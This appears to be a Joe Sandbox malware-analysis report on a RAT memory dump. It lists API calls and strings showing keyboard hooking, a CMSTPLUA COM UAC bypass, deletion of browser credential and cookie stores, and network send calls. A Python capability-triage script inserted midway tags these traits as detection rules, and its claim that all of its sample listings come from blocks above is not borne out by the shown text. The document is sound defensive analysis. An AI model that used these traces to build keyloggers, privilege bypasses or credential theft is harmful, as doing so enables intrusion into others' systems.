                            • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                            • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0$1$2$3$4$5$6$7$VG
                            • API String ID: 0-1861860590
                            • Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                            • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                            • Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
                            • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C37D
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C3AD
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C41F
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C42C
                              • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C402
                            • GetLastError.KERNEL32(?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C44D
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C463
                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C46A
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C473
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                            • String ID: `.S
                            • API String ID: 2341273852-1324555088
                            • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                            • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                            • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                            • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                            APIs
                            • _wcslen.LIBCMT ref: 0040755C
                            • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Object_wcslen
                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                            • API String ID: 240030777-3166923314
                            • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                            • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                            • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                            • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                            APIs
                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                            • GetLastError.KERNEL32 ref: 0041A84C
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                            • String ID:
                            • API String ID: 3587775597-0
                            • Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                            • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                            • Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
                            • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                            • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                            • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                            • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                            • String ID: JD$JD$JD
                            • API String ID: 745075371-3517165026
                            • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                            • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                            • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                            • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                            • FindClose.KERNEL32(00000000), ref: 0040C4B8
                            • FindClose.KERNEL32(00000000), ref: 0040C4E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 1164774033-405221262
                            • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                            • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                            • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                            • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                              • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$CreateFirstNext
                            • String ID: 8SG$PXG$PXG$NG$PG
                            • API String ID: 341183262-3812160132
                            • Opcode ID: 6f7d9e176dbb922e5901518d2a500cbc9bfb5a1b0f14e37a1c7bedcfbb51ebec
                            • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                            • Opcode Fuzzy Hash: 6f7d9e176dbb922e5901518d2a500cbc9bfb5a1b0f14e37a1c7bedcfbb51ebec
                            • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                            • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                            • GetLastError.KERNEL32 ref: 0040A328
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • GetMessageA.USER32 ref: 0040A376
                            • TranslateMessage.USER32(?), ref: 0040A385
                            • DispatchMessageA.USER32 ref: 0040A390
                            Strings
                            • Keylogger initialization failure: error , xrefs: 0040A33C
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                            • String ID: Keylogger initialization failure: error
                            • API String ID: 3219506041-952744263
                            • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                            • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                            • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                            • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                            • String ID:
                            • API String ID: 1888522110-0
                            • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                            • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                            • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                            • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                            APIs
                            • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                            • RegCloseKey.ADVAPI32(?), ref: 004140E4
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                            • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressCloseCreateLibraryLoadProcsend
                            • String ID: SHDeleteKeyW$Shlwapi.dll
                            • API String ID: 2127411465-314212984
                            • Opcode ID: feda3c0cb2e05dbf246105b527e356fbe40292db3182a56c896b5e0f635c8d19
                            • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                            • Opcode Fuzzy Hash: feda3c0cb2e05dbf246105b527e356fbe40292db3182a56c896b5e0f635c8d19
                            • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                            APIs
                            • _free.LIBCMT ref: 00449292
                            • _free.LIBCMT ref: 004492B6
                            • _free.LIBCMT ref: 0044943D
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                            • _free.LIBCMT ref: 00449609
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                            • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                            • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                            • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                            APIs
                              • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                              • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                              • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                              • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                              • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                            • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                            • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                            • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                            • String ID: !D@$PowrProf.dll$SetSuspendState
                            • API String ID: 1589313981-2876530381
                            • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                            • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                            • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                            • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                            • GetLastError.KERNEL32 ref: 0040BA93
                            Strings
                            • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                            • UserProfile, xrefs: 0040BA59
                            • [Chrome StoredLogins not found], xrefs: 0040BAAD
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            • API String ID: 2018770650-1062637481
                            • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                            • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                            • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                            • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
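The function listings above (keyboard hook setup, the CoGetObject call with the Elevation:Administrator!new: moniker and the CMSTPLUA CLSID, the Chrome Login Data and Firefox cookies.sqlite deletion, the Toolhelp32 enumeration that names ieinstal.exe and ielowutil.exe) are what an analyst reads by hand to turn API evidence into capability verdicts. The script below is an added example, not code from the Joe Sandbox report, Joe Security or Remcos: it parses listings in this report's format and applies that reasoning as rules. The rule set, the tag names and the SAMPLE text (four listings trimmed from the blocks above) are this example's own assumptions; the CMSTPLUA CLSID and the WH_KEYBOARD_LL hook id 0x0D are taken from the report's own strings and arguments.

```python
"""Capability triage over Joe Sandbox IDA-plugin function listings.
Added example (not Joe Security's or Remcos code): rule names, tag vocabulary
and the trimmed SAMPLE listings below are this example's own choices."""
import re
from dataclasses import dataclass, field

# Constructed sample: four listings in the report's format, each ending with its
# 'Instruction Fuzzy Hash' line; API and String ID lines trimmed from the page.
SAMPLE = r"""
APIs
• SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
• String ID: Keylogger initialization failure: error
• Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
• Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
APIs
• CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] ucmAllocateElevatedObject${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
• Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
• String ID: [Chrome StoredLogins found, cleared!]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
• Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
• Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
• Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
"""

API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"([\w@]+)\.(\w+)(?:\((.*)\))?,?\s*ref:")
STRING_ID_RE = re.compile(r"^•\s*String ID:\s*(.*)$")
OPCODE_RE = re.compile(r"^•\s*Opcode ID:\s*([0-9a-f]+)")
END_RE = re.compile(r"^•\s*Instruction Fuzzy Hash:")
WH_KEYBOARD_LL = 13  # idHook 0x0D, the first argument of the SetWindowsHookExA call above
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"  # from the report's strings


@dataclass
class Function:
    opcode_id: str = ""
    apis: list = field(default_factory=list)     # (name, module, [args])
    strings: list = field(default_factory=list)


def parse_listing(text):
    """One Function record per block; a block ends at its Instruction Fuzzy Hash line."""
    funcs, cur = [], Function()
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            args = [a.strip() for a in (m.group(3) or "").split(",") if a.strip()]
            cur.apis.append((m.group(1), m.group(2), args))
        elif m := STRING_ID_RE.match(line):
            cur.strings.extend(s for s in m.group(1).split("$") if s)
        elif m := OPCODE_RE.match(line):
            cur.opcode_id = m.group(1)
        elif END_RE.match(line):
            funcs.append(cur)
            cur = Function()
    return funcs


def has_api(fn, *names):
    return any(n in names for n, _, _ in fn.apis)


def has_str(fn, needle):
    return any(needle.lower() in s.lower() for s in fn.strings)


def hex_arg(args, i):
    """Argument i as an int, or None when it is absent or not hex (e.g. '?')."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def classify(fn):
    """Map one function's API, argument and string evidence to capability tags."""
    tags = []
    if any(n.startswith("SetWindowsHookEx") and hex_arg(a, 0) == WH_KEYBOARD_LL
           for n, _, a in fn.apis):
        tags.append("keylogger: WH_KEYBOARD_LL hook")
    if has_api(fn, "CoGetObject") and has_str(fn, "Elevation:Administrator!new:") \
            and has_str(fn, CMSTPLUA_CLSID):
        tags.append("uac_bypass: COM elevation moniker to CMSTPLUA")
    if (has_str(fn, "Login Data") or has_str(fn, "cookies.sqlite")) \
            and (has_api(fn, "DeleteFileA", "DeleteFileW") or has_str(fn, "cleared!")):
        tags.append("anti_forensics: browser credential or cookie store deleted")
    if has_api(fn, "CreateToolhelp32Snapshot") and has_api(fn, "OpenProcess") \
            and (has_str(fn, "ieinstal.exe") or has_str(fn, "ielowutil.exe")):
        tags.append("process_targeting: enumerates processes, names IE helper binaries")
    return tags


def triage(text):
    """Return {opcode-id prefix: [tags]} for every function that hits a rule."""
    return {fn.opcode_id[:12]: t for fn in parse_listing(text) if (t := classify(fn))}
```

Calling `triage(SAMPLE)` returns one entry per sample function, keyed by the first twelve characters of its Opcode ID, so verdicts stay linked to the function the report documents. The hook rule deliberately checks the idHook argument rather than the API name alone: SetWindowsHookEx is also used legitimately, and it is the 0x0D (WH_KEYBOARD_LL) value that makes the call a keylogger indicator. The browser rule accepts either a DeleteFile call or the "cleared!" status string because the Firefox cookie function above performs the deletion in a subcall the listing does not show.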
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                            • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                            • GetLastError.KERNEL32 ref: 004179D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3534403312-3733053543
                            • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                            • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                            • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                            • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                            APIs
                            • __EH_prolog.LIBCMT ref: 00409293
                              • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,020F4950,00000010), ref: 004048E0
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                            • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                            • FindClose.KERNEL32(00000000), ref: 004093FC
                              • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                              • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                              • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                            • FindClose.KERNEL32(00000000), ref: 004095F4
                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                            • String ID:
                            • API String ID: 1824512719-0
                            • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
